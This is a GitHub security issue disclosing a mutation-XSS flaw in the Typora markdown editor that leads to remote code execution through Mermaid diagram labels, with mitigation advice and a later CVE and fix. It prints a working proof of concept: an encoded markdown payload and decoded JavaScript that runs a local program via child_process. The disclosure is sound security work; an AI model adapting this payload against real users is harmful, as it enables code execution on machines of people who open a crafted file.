Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Typora RCE via mXSS #3124

Closed
0xBADCA7 opened this issue Dec 27, 2019 · 2 comments
Closed

Typora RCE via mXSS #3124

0xBADCA7 opened this issue Dec 27, 2019 · 2 comments

Comments

@0xBADCA7
Copy link

0xBADCA7 commented Dec 27, 2019

Summary

A mXSS in Typora leads to remote code execution. The vector is Mermaid code blocks (HTML labels) however other spots where Typora attempts to clean up HTML using DOMPurify could be prone to the same.

Steps to reproduce / PoC

  1. Create an .md with the following contents:
```mermaid
graph TD
z --> q{<svg></p><style><g title=&#x3c&#x73&#x76&#x67&#x3e&#x0a&#x22&#x3c&#x2f&#x73&#x74&#x79&#x6c&#x65&#x3e&#x3c&#x69&#x6d&#x67&#x20&#x73&#x72&#x63&#x20&#x6f&#x6e&#x65&#x72&#x72&#x6f&#x72&#x3d&#x65&#x76&#x61&#x6c&#x28&#x61&#x74&#x6f&#x62&#x28&#x27&#x64&#x48&#x4a&#x35&#x65&#x33&#x5a&#x68&#x63&#x69&#x42&#x79&#x50&#x58&#x4a&#x6c&#x63&#x57&#x35&#x76&#x5a&#x47&#x55&#x6f&#x4a&#x32&#x4e&#x6f&#x61&#x57&#x78&#x6b&#x58&#x33&#x42&#x79&#x62&#x32&#x4e&#x6c&#x63&#x33&#x4d&#x6e&#x4b&#x54&#x74&#x79&#x4c&#x6d&#x56&#x34&#x5a&#x57&#x4e&#x47&#x61&#x57&#x78&#x6c&#x4b&#x43&#x63&#x76&#x64&#x58&#x4e&#x79&#x4c&#x32&#x4a&#x70&#x62&#x69&#x39&#x6e&#x62&#x6d&#x39&#x74&#x5a&#x53&#x31&#x6a&#x59&#x57&#x78&#x6a&#x64&#x57&#x78&#x68&#x64&#x47&#x39&#x79&#x4a&#x79&#x6c&#x38&#x66&#x48&#x49&#x75&#x5a&#x58&#x68&#x6c&#x59&#x30&#x5a&#x70&#x62&#x47&#x55&#x6f&#x4a&#x32&#x4e&#x68&#x62&#x47&#x4d&#x75&#x5a&#x58&#x68&#x6c&#x4a&#x79&#x6c&#x39&#x59&#x32&#x46&#x30&#x59&#x32&#x68&#x37&#x64&#x32&#x6c&#x75&#x5a&#x47&#x39&#x33&#x4c&#x6d&#x4a&#x79&#x61&#x57&#x52&#x6e&#x5a&#x53&#x35&#x6a&#x59&#x57&#x78&#x73&#x53&#x47&#x46&#x75&#x5a&#x47&#x78&#x6c&#x63&#x69&#x67&#x6e&#x64&#x32&#x6c&#x75&#x5a&#x47&#x39&#x33&#x4c&#x6d&#x39&#x77&#x5a&#x57&#x34&#x6e&#x4c&#x43&#x41&#x6e&#x5a&#x6d&#x6c&#x73&#x5a&#x54&#x6f&#x76&#x4c&#x79&#x39&#x54&#x65&#x58&#x4e&#x30&#x5a&#x57&#x30&#x76&#x51&#x58&#x42&#x77&#x62&#x47&#x6c&#x6a&#x59&#x58&#x52&#x70&#x62&#x32&#x35&#x7a&#x4c&#x30&#x4e&#x68&#x62&#x47&#x4e&#x31&#x62&#x47&#x46&#x30&#x62&#x33&#x49&#x75&#x59&#x58&#x42&#x77&#x4c&#x30&#x4e&#x76&#x62&#x6e&#x52&#x6c&#x62&#x6e&#x52&#x7a&#x4c&#x30&#x31&#x68&#x59&#x30&#x39&#x54&#x4c&#x30&#x4e&#x68&#x62&#x47&#x4e&#x31&#x62&#x47&#x46&#x30&#x62&#x33&#x49&#x6e&#x4b&#x58&#x30&#x37&#x27&#x29&#x29&#x3e&#x22>}

```
  1. Open the file in Typora
  2. Witness a calculator pop up:

poc1

The payload is simply HTML-entity-encoded

<svg></p><style><g title=</style><img src onerror=eval(atob('dHJ5e3ZhciByPXJlcW5vZGUoJ2NoaWxkX3Byb2Nlc3MnKTtyLmV4ZWNGaWxlKCcvdXNyL2Jpbi9nbm9tZS1jYWxjdWxhdG9yJyl8fHIuZXhlY0ZpbGUoJ2NhbGMuZXhlJyl9Y2F0Y2h7d2luZG93LmJyaWRnZS5jYWxsSGFuZGxlcignd2luZG93Lm9wZW4nLCAnZmlsZTovLy9TeXN0ZW0vQXBwbGljYXRpb25zL0NhbGN1bGF0b3IuYXBwL0NvbnRlbnRzL01hY09TL0NhbGN1bGF0b3InKX07'))>}

where the JS is simply:

try{var r=reqnode('child_process');r.execFile('/usr/bin/gnome-calculator')||r.execFile('calc.exe')}catch{window.bridge.callHandler('window.open', 'file:///System/Applications/Calculator.app/Contents/MacOS/Calculator')};

Fix

It's perhaps best to upgrade DOMPurify to the latest version which seems to address new mutation XSS vectors. It looks like the version that's shipped with Typora is somewhat old (1.0.4).

Consider employing Content-Security Policy for a broader mitigation. It appears that RCE via XSS emerges as a pattern among Typora's issues. Implementing a fine-tuned CSP is time consuming but building a good policy step by step could prove worthy in the long run and cover users even when new XSS vectors are discovered.

Notes

Versions known to be vulnerable and tested are 0.9.81, 0.9.9.31.2 (3946). These are the latest downloads from the website (for Linux and MacOS respectively). I did not test the Windows version of the app.

CVSS 8.3

My take is CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

// Mark Art at Havoc Research

@0xBADCA7
Copy link
Author

CVE-2019-20374 was allocated for this one.

@abnerlee
Copy link
Contributor

Fixed in latest version

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants